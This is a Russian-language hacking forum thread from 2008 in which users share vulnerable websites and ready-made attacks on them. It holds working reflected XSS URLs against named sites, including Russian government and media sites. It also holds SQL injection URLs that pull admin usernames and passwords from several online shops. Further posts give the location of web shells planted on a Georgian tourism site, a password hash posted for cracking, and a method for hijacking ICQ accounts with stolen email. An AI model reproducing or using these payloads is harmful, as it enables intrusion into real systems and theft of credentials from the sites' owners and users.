Форумы
Правила форума
Сегодняшние посты
Зарегистрироваться Вход Мой профиль Входящие Адресная книга Моя подписка Мои форумы
Выход
Текстовая версия Список пользователей
Карта Top-100 пользователей Календари Ticket List
Фото галерея
ПОИСК FAQ RSS: 20 последних сообщений форума 20 последних топиков форума
Пользователи, просматривающие топик:
none
Имя
16.03.2008 19:55:52
b[e]nder
9973c2136f6f80e0d1aac6ec24149e29 мне кажется что это хэш
16.03.2008 19:57:03
b[e]nder
необязательно использовать sql там есть upload добыть шелл а следовательно и пасс можно другими способами
20.03.2008 23:19:10
x23r0
[link=http://www2006.org/programme/item.php?id=%3Csсriрt%3Ealert('sss')%3C/sсriрt%3E]http://www2006.org/programme/item.php?id=%3Csсriрt%3Ealert('sss')%3C/sсriрt%3E[/link]
20.03.2008 23:48:18
x23r0
[link=http://www.clasp.org/publications.php?id=-1+union+select+1,2,concat(char(39),password,char(39)),4,5,6,7,8,9,0,11,12,13,14,15+from+user/]http://www.clasp.org/publications.php?id=-1+union+select+1,2,concat(char(39),password,char(39)),4,5,6,7,8,9,0,11,12,13,14,15+from+user/[/link]*
30.03.2008 22:36:54
Out
Пассивные xss http://www.duma.gov.ru/index.jsp?t="><sсriрt>alert(/byOut/)</sсriрt> http://www.ldpr.ru/search/?s="><sсriрt>alert(/byOut/)</sсriрt> http://www.1tv.ru/owa/win/ort5_shed.shed?p_shed_title_id=131754&p_date="><sсriрt>alert(/byOut/)</sсriрt> http://www.rutv.ru/rnews.html?id=130873&d="><sсriрt>alert(/byOut/)</sсriрt> http://partners.agava.ru/cgi/sites/create_site.cgi?project=%22%3E%3Csсriрt%3Ealert(/byOut/)%3C/sсriрt%3E
31.03.2008 8:27:36
ADiel
http://plot-ilya.narod.ru/remview.php проверьте пожалуйста, работает ли. буду очень благодарен) а то не работает у меня)))
31.03.2008 8:45:13
blаcksun
quote: http://plot-ilya.narod.ru/remview.php проверьте пожалуйста, работает ли. буду очень благодарен) а то не работает у меня)))
31.03.2008 9:15:03
ADiel
не на народе же я его загружаю.)) он вымолняетя на серваке - жертве)))
04.04.2008 16:10:02
archangel23
хелп, что дальше))) Warning : fopen(../exit.log): failed to open stream: No such file or directory in /www/http/petrochatru/PSBGUI/exit.save.php on line 14 Warning : feof(): supplied argument is not a valid stream resource in /www/http/petrochatru/PSBGUI/exit.save.php on line 16 Warning : fgets(): supplied argument is not a valid stream resource in /www/http/petrochatru/PSBGUI/exit.save.php on line 18
archangel23 -- 04.04.2008 17:35:35 >
04.04.2008 21:20:33
blаcksun
Дальше ап стену
19.04.2008 20:25:46
iPower
Есть один сука сайт, http://www.playground.ru/?search=">XSS
iPower -- 19.04.2008 20:40:15 >
29.04.2008 8:50:54
novosibirec
на ngs.ru кто нить знает какие нить уязвимости!? найти на получается! ((( предпочтительнее xss
18.06.2008 3:11:43
AKYLA
Дыра в WEbMail http://nobile.com.ua/webmail/tmp/?M=A http://www.x-host.ua/
10.08.2008 23:10:56
FreeKing
ttc.ge/admin/file_upload.php - загрузка и выполнение произволтьных скриптов. Полный контроль над грузинским туристическим сайтом. Там уже залито 2 шелла, например, r57 работает по адресу http://ttc.ge/photos/img.php.
21.09.2008 20:48:26
bobik23
а как это рашивровывается с ..... paswordPro или мд5
21.09.2008 23:54:10
StereoniX
Аналогично :) http://store.rockemfashions.com/user/category_search.php?id=-1+union+select+all+1,%20concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login-- http://www.robotfactory.biz/user/category_search.php?id=-1+union+select+all+1,%20concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login-- http://www.facestixs.com/user/category_search.php?id=-1+union+select+all+1,%20concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login-- https://southtownsales.com/user/category_search.php?id=-1+union+select+all+1,%20concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login-- http://oc-1dental.com/user/category_search.php?id=-1+union+select+all+1,%20concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login-- http://nashvillesexywear.com/user/category_search.php?id=-1+union+select+all+1,%20concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login--
25.11.2008 6:35:51
space56
http://icq.com/mail короч если угнали мыло.....можно и угнать асю!проверяем ...в поле ICQ Number or Email вводим емаил который угнали а в поле ICQ Password вводим любой пароль...жмём Login и нам выдаётся номер к которому привязано мыло которое мы вводили
Популярные с новыми сообщениями Популярные без новых сообщений
Версия для печати
RE: Раздача слонов II - 
и много чего разного около 128 сайтов
